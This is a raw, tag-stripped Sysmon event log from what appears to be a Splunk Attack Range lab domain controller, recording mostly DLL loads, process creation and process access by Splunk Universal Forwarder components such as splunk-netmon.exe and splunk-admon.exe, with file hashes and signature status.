Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x8000000000000000100064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 
734700x8000000000000000100058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 
734700x8000000000000000100051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 
librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7trueMicrosoft WindowsValid 734700x8000000000000000100043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft 
Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x8000000000000000100040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECCtrueMicrosoft WindowsValid 734700x8000000000000000100039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55trueMicrosoft WindowsValid 
734700x8000000000000000100037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 10341000x8000000000000000100033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52trueSplunk, Inc.Valid 10341000x8000000000000000100028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.561{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x8000000000000000100076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.076{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.076{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating 
SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.076{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:48.716{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D3050E75943D4D9AD78FBC231D742CF,SHA256=FAFBB8C9E93492444B517B6B9BB22DBFE9FD9F7312983A82A75C3DEA08C66179,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:49.919{326FD73D-C12D-6294-430B-000000005502}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 
